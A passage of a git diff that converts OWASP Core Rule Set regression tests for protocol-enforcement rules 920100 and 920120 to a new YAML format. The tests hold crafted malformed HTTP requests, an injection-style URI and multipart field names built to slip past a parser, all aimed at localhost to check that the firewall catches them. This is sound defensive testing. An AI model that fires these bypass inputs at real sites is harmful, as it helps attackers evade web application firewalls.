text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "1.2.3.4:80" + version: "HTTP/1.1" + output: + status: 200 + log: + no_expect_ids: [920100] + - test_id: 5 desc: invalid Connect request, domains require ports stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org" - version: "HTTP/1.1" - output: - status: [400] - - test_title: 920100-6 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 6 desc: This is an acceptable CONNECT request for SSL tunneling stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org:80" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-7 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org:80" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 7 desc: Valid request with query and anchor components stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 8 desc: | - The colon in the path is not allowed. Apache will block by default + The colon in the path is not allowed. Apache will block by default: (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html:80?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - status: [400, 403] - - test_title: 920100-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html:80?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 9 desc: Normal Options request with path stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-10 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 10 desc: An invalid method with a long name stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" - - test_title: 920100-11 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920100] + - test_id: 11 desc: | - An invalid request because a backslash is used in uri + An invalid request because a backslash is used in URI. Apache will end up blocking this before it gets to CRS. - We will need to support OR output tests to fix this + We will need to support OR output tests to fix this. stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "\\" - version: "HTTP/1.1" - output: - status: [403, 400] - - test_title: 920100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "\\" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 12 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: "\tGET" - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - status: [400] - - test_title: 920100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: "\tGET" + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + status: 400 + - test_id: 13 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: \index.html - version: HTTP\1.0 - output: - status: [403, 400] - - test_title: 920100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: \index.html + version: HTTP\1.0 + output: + status: 400 + - test_id: 14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: '|GET' - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "920100" - - test_title: 920100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: '|GET' + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [920100] + - test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [403, 400] - - test_title: 920100-16 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 16 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "http://localhost" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "http://localhost" + version: "HTTP/1.1" + output: + log: + expect_ids: [920100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 848cebe9b..703b8f78f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml @@ -1,969 +1,968 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920120.yaml" description: "Tests to trigger rule 920120" +rule_id: 920120 tests: - - test_title: 920120-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en" - Connection: "close" - Referer: "http://localhost/" - Content-Type: "multipart/form-data; boundary=--------397236876" - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="file=.txt" - Content-Type: text/plain - - 555-555-0199@example.com - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-2 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en" + Connection: "close" + Referer: "http://localhost/" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="file=.txt" + Content-Type: text/plain + + 555-555-0199@example.com + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive - Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /cgi-bin/fup.cgi - version: HTTP/1.1 - data: | - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="fi=le"; filename="test" - Content-Type: text/plain - - email: security@example.com - - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="note" - - Contact info. - -----------------------------627652292512397580456702590-- - output: - log_contains: id "920120" - - test_title: 920120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive + Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /cgi-bin/fup.cgi + version: HTTP/1.1 + data: | + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="fi=le"; filename="test" + Content-Type: text/plain + + email: security@example.com + + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="note" + + Contact info. + -----------------------------627652292512397580456702590-- + output: + log: + expect_ids: [920120] + - test_id: 3 desc: Invalid Request Body (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: en-us,en;q=0.5 - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.1 - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="fi;le"; filename="test" - Content-Type: application/octet-stream - - Rotem & Ayala - - -----------------------------265001916915724 - Content-Disposition: form-data; name="name" - - tt2 - -----------------------------265001916915724 - Content-Disposition: form-data; name="B1" - - Submit - -----------------------------265001916915724-- - output: - log_contains: id "920120" - - test_title: 920120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: en-us,en;q=0.5 + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.1 + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="fi;le"; filename="test" + Content-Type: application/octet-stream + + Rotem & Ayala + + -----------------------------265001916915724 + Content-Disposition: form-data; name="name" + + tt2 + -----------------------------265001916915724 + Content-Disposition: form-data; name="B1" + + Submit + -----------------------------265001916915724-- + output: + log: + expect_ids: [920120] + - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="file"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="file"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 5 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=";zzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=";zzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 6 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="amp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="amp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 7 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 8 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="p;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="p;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 9 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zamp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zamp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 10 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zmp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zmp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 11 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 12 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Z;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Z;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 13 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 14 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 15 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 16 desc: Attempted multipart/form-data bypass (920120). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id 